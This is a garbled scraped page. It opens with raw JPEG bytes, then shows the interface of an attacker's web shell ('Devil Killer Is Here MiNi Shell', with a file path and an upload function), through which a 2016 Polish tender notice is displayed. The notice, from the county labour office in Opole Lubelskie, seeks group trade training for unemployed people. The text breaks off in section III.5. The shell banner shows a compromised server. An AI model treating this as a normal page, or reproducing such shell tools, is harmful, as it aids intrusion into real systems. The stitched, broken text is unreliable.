JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20160929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20160929/315416-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 315416 - 2016
              z dnia 2016-09-29 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opole Lubelskie: Szkolenie grupowe dla osób bezrobotnych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Aktywizacja Osób w wieku 30 lat i więcej w powiecie opolskim (II) współfinansowanego z Europejskiego Funduszu Społecznego w ramach działania 9.2 Regionalnego Programu Operacyjnego  Województwa Lubelskiego na lata  2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Urząd Pracy, krajowy numer identyfikacyjny
              43120140800000, ul.
              Stary Rynek 
              ,
              24300  
              Opole Lubelskie, woj.
              lubelskie, państwo
              , tel.
              81 827 73 50, e-mail
              luop@praca.gov.pl, faks
              81 827 73 51.
              <br />
              Adres strony internetowej (URL): http://pup.opole.lubelskie.sisco.info   <br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                http://pup.opole.lubelskie.sisco.info   </div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://pup.opole.lubelskie.sisco.info   </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />Powiatowy Urzad Pracy ul. Stary Rynek 14-16, 24-300 Opole Lubelske</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Powiatowy Urzad Pracy ul. Stary Rynek 14-16, 24-300 Opole Lubelske</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Szkolenie grupowe dla osób bezrobotnych<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    tylko jednej części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />4<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />4<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przeprowadzenie szkoleń grupowych dla bezrobotnych w 4 częściach: Część I: Magazynier z obsługą wózków jezdniowych z napędem silnikowy. Liczba godzin: co najmniej 100 godzin zegarowych (133 godziny edukacyjne) łącznie z egzaminem państwowym w części dotyczącej obsługi wózków jezdniowych z napędem silnikowym (3 godziny zegarowe) przed komisją Urzędu Dozoru Technicznego. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.Liczba osób: 6 osób, liczba grup kursowych: jedna grupa. Część II:Brukarz z egzaminem czeladniczym. Liczba godzin: co najmniej 201 godzin zegarowych (268 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.Liczba osób: 10 osób, liczba grup kursowych: jedna grupa Część III:Glazurnik z egzaminem czeladniczym. Liczba godzin co najmniej 201 godzin zegarowych (268 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.Liczba osób: 10 osób, liczba grup kursowych: jedna grupa. Część IV:Kucharz z egzaminem czeladniczym.Liczba godzin: co najmniej 160 godzin zegarowych i 30 minut (214 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.Liczba osób: 6 osób, liczba grup kursowych: jedna grupa. 
 <br /><br /><b>II.5) Główny kod CPV: </b>80530000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 2<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                o	Wykonawca wykaże, że posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy, tj. Dz. U. z 2016r. poz. 645 z późn. zm.) w związku z § 1 pkt 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2013, poz. 231)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W celu potwierdzenia spełniania tego warunku, Wykonawca wykaże że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi szkoleniowe odpowiadające swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia o tematyce zgodnej z przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których te usługi zostały wykonane z załączeniem dowodów czy zostały wykonane należycie lub są wykonywane należycie, w tym Dla części I:
1/ co najmniej 2 szkolenia grupowe, gdzie grupa liczyła co najmniej 5 osób, odpowiadających swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, o tematyce zgodnej z przedmiotem zamówienia (cały zakres programowy, tj. Moduł magazynowy + sprzedaż + obsługa kas fiskalnych łącznie z Modułem obsługi wózka jezdniowego z wymianą butli gazowych) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te zostały wykonane oraz dowodów że zostały wykonane należycie lub są wykonywane należycie,
lub
2/ co najmniej 2 szkolenia grupowe, gdzie grupa liczyła co najmniej 5 osób, odpowiadających swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, o tematyce zgodnej z przedmiotem zamówienia w zakresie jednego modułu tj. Moduł magazynowy + sprzedaż + obsługa kas fiskalnych wraz z dowodami że zostały wykonane należycie lub są wykonywane należycie,
oraz 
- co najmniej 2 szkolenia grupowe gdzie grupa liczyła co najmniej 5 osób, odpowiadających swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, o tematyce zgodnej z przedmiotem zamówienia w zakresie: modułu tj.  Obsługi wózka jezdniowego z napędem silnikowym wraz z dowodami że zostały wykonane należycie lub są wykonywane należycie. Dla części II-IV:
- co najmniej 1 szkolenie grupowe, gdzie grupa liczyła co najmniej 5 osób, odpowiadających swoim rodzajem usłudze stanowiącej przedmiot niniejszego zamówienia, o tematyce zgodnej z przedmiotem zamówienia wraz z podaniem jego wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługa te została wykonana wraz z dowodami że została ona wykonana należycie lub jest wykonywana należycie.
Wykonawca wykaże osoby, które będą skierowane przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usługi szkoleniowej wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami.Dla Części I: co najmniej 1 wykładowcą (na liście podstawowej), który będzie prowadzić zajęcia teoretyczne oraz dodatkowo co najmniej 1 wykładowcą (na liście rezerwowej) którzy spełniają łącznie następujące wymagania:
- posiadają co najmniej średnie wykształcenie, kwalifikacje zawodowe/uprawnienia zgodne z tematyką szkolenia oraz przygotowanie pedagogiczne, 
- posiadają doświadczenie w prowadzeniu szkoleń (co najmniej 3 szkolenia poprowadzone i zakończone w zakresie Sprzedawca z obsługą komputera i programów magazynowych lub Magazynier z obsługą wózków jezdniowych lub Obsługa kas fiskalnych)oraz co najmniej 1 instruktorem zajęć praktycznych (na liście podstawowej), który będzie prowadzić zajęcia praktyczne oraz dodatkowo co najmniej 1 instruktorem (na liście rezerwowej)  którzy spełniają łącznie następujące wymagania:
- posiadają przygotowanie pedagogiczne dla instruktorów praktycznej nauki zawodu,
- posiadają wykształcenie co najmniej średnie techniczne,
- posiadają doświadczenie w prowadzeniu szkoleń w zakresie kierowania i obsługi wózków jezdniowych (co najmniej 3 szkolenia poprowadzone i zakończone).Dla Części II:co najmniej 2 wykładowcami (na liście podstawowej), którzy będą prowadzić zajęcia teoretyczne oraz dodatkowo co najmniej 1 wykładowcą (na liście rezerwowej)  którzy spełniają łącznie następujące wymagania:
- posiadają kwalifikacje zawodowe i wykształcenie niezbędne do wykonywania zamówienia oraz przygotowanie pedagogiczne,
- posiadają doświadczenie w prowadzeniu szkoleń odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia (co najmniej 3 szkolenia poprowadzone i zakończone)
oraz
co najmniej 2 instruktorami zajęć praktycznych (na liście podstawowej), którzy będą prowadzić zajęcia praktyczne oraz dodatkowo co najmniej 1 instruktorem (na liście rezerwowej)  którzy spełniają łącznie następujące wymagania:
- posiadają kwalifikacje zawodowe i wykształcenie niezbędne do wykonywania zamówienia, 
- posiadają doświadczenie w prowadzeniu szkoleń odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia część praktyczna (co najmniej 3 szkolenia poprowadzone i zakończone) lub posiadają co najmniej dwuletnie doświadczenie w pracy na stanowisku brukarz. Dla Części III:
co najmniej 2 wykładowcami (na liście podstawowej), którzy będą prowadzić zajęcia teoretyczne oraz dodatkowo co najmniej 1 wykładowcą (na liście rezerwowej)  którzy  spełniają łącznie następujące wymagania:
- posiadają kwalifikacje zawodowe i wykształcenie niezbędne do wykonywania zamówienia oraz przygotowanie pedagogiczne,
- posiadają doświadczenie w prowadzeniu szkoleń odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia (co najmniej 3 szkolenia poprowadzone i zakończone)
oraz
co najmniej 2 instruktorami zajęć praktycznych (na liście podstawowej), którzy będą prowadzić zajęcia praktyczne  oraz dodatkowo co najmniej 1 instruktorem (na liście rezerwowej) którzy spełniają łącznie następujące wymagania:
- posiadają kwalifikacje zawodowe i wykształcenie niezbędne do wykonywania zamówienia, 
- posiadają doświadczenie w prowadzeniu szkoleń odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia -część praktyczna (co najmniej 3 szkolenia poprowadzone i zakończone) lub posiadają co najmniej dwuletnie doświadczenie w pracy na stanowisku glazurnik.
Dla Części IV:
co najmniej 2 wykładowcami (na liście podstawowej), którzy będą prowadzić zajęcia teoretyczne oraz dodatkowo co najmniej 1 wykładowcą (na liście rezerwowej) którzy  spełniają łącznie następujące wymagania:
-	posiadają przygotowanie pedagogiczne oraz kwalifikacje zawodowe niezbędne do wykonywania zamówienia, 
-	posiadają doświadczenie w prowadzeniu szkoleń grupowych (co najmniej 3 szkolenia poprowadzone i zakończone zawierające wybrane zagadnienia z programu przedmiotowego zamówienia)
oraz
co najmniej 2 instruktorami zajęć praktycznych (na liście podstawowej), którzy będą prowadzić zajęcia praktyczne  oraz dodatkowo co najmniej 1 instruktorem (na liście rezerwowej)  którzy spełniają łącznie następujące wymagania:
-	posiadają przygotowanie i kwalifikacje zawodowe niezbędne do wykonywania zamówienia, 
-  posiadają doświadczenie w prowadzeniu szkoleń odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia (co najmniej 3 szkolenia poprowadzone i zakończone w zakresie przygotowywania i obróbki żywności oraz dekoracji potraw) lub posiadają co najmniej dwuletnie doświadczenie w pracy na stanowisku kucharz.
W celu potwierdzenia spełniania tego warunku, Wykonawca wykaże że będzie dysponował narzędziami, wyposażeniem zakładu lub urządzeniami technicznymi niezbędnymi do realizacji niniejszego zamówienia wraz z informacją o podstawie prawnej do dysponowania tymi zasobami, w tym: Dla części I:
1)	jedną salą wykładową przystosowaną do liczby słuchaczy przewidzianych do przeszkolenia, wyposażoną w miejsca siedzące, gdzie zapewnione są właściwe warunki BHP p.poż., dostęp do światła dziennego z możliwością zaciemnienia i zapewnienia oświetlenia sztucznego oraz zapleczem socjalnym i sanitarnym; 
2)	stolikami i krzesłami dla 6 uczestników szkolenia;
3)	6 kasami  fiskalnymi;
4)	6 zestawami komputerowymi lub komputerami przenośnymi z monitorami lub wyświetlaczami w technologii LCD z legalnym oprogramowaniem systemowym i legalnym oprogramowaniem użytkowym, w szczególności programami magazynowych wykorzystywanych w handlu, np. WF Mag, Subiekt z dostępem do Internetu,
5)	6 czytnikami kart płatniczych,
6)	6 metkownicami,
7)	co najmniej  3 czytnikami kodów kreskowych;
8)	co najmniej  1 drukarką fiskalną;
9)	tablicą lub flipchartem z zapasem kartek lub rzutnikiem i ekranem - w zależności od sposobu prowadzenia zajęć;
10)	co najmniej dwoma typami wózków jezdniowych sprawnymi technicznie, w tym jednym wózkiem jezdniowym podnośnikowym,
11)	placem manewrowym do przeprowadzenia szkolenia,
12)	co najmniej 6 paletami.
Dla Części II:
1)	na zajęcia teoretyczne - jedną salą wykładową przystosowaną do liczby słuchaczy przewidzianych do przeszkolenia, wyposażoną w miejsca siedzące, gdzie zapewnione są właściwe warunki BHP p.poż., dostęp do światła dziennego z możliwością zaciemnienia i zapewnienia oświetlenia sztucznego oraz zapleczem socjalnym i sanitarnym; 
2)	stolikami i krzesłami dla 10 uczestników szkolenia;
3)	tablicą lub flipchartem z zapasem kartek lub rzutnikiem i ekranem - w zależności od sposobu prowadzenia zajęć,
4)	miejscem na przeprowadzenie zajęć praktycznych w firmie zajmującej się usługami brukarskimi lub w zakładzie/przedsiębiorstwie gospodarki komunalnej,
5)	narzędziami i sprzętem technicznym niezbędnym do wykonania robót brukarskich.
Dla Części III:
1)	na zajęcia teoretyczne - jedną salą wykładową przystosowaną do liczby słuchaczy przewidzianych do przeszkolenia, wyposażoną w miejsca siedzące, gdzie zapewnione są właściwe warunki BHP p.poż., dostęp do światła dziennego z możliwością zaciemnienia i zapewnienia oświetlenia sztucznego oraz zapleczem socjalnym i sanitarnym; 
2)	stolikami i krzesłami dla 10 uczestników szkolenia,
3)	tablicą lub flipchartem z zapasem kartek lub rzutnikiem i ekranem - w zależności od sposobu prowadzenia zajęć;
4)	narzędziami i sprzętem technicznym dla każdego z 10-ciu uczestników szkolenia, niezbędnym do wykonania robót w zakresie układania glazury i terakoty oraz drobnych prac remontowych.
Dla Części IV:
1)	jedną salą wykładową przystosowaną do liczby słuchaczy przewidzianych do przeszkolenia, wyposażoną w miejsca siedzące, gdzie zapewnione są właściwe warunki BHP p.poż., dostęp do światła dziennego z możliwością zaciemnienia i zapewnienia oświetlenia sztucznego oraz zapleczem socjalnym i sanitarnym; 
2)	stolikami i krzesłami dla 6 uczestników szkolenia, 
3)	tablicą lub flipchartem z zapasem kartek lub rzutnikiem i ekranem - w zależności od sposobu prowadzenia zajęć.
4)	6 kasami  fiskalnymi (co najmniej 3 typów);
5)	co najmniej  1 drukarką fiskalną;
6)	miejscem na przeprowadzenie zajęć praktycznych, tj. restauracja/lokal/punkt  gastronomiczny z wyposażeniem niezbędnym do przygotowywania i obróbki żywności.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie wykonawcy o braku podstaw do wykluczenia określonych przez Zamawiającego.
Aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu wskazanego w wezwaniu.
Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej co inni Wykonawcy, którzy złożyli oferty/ofert częściowe w postępowaniu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
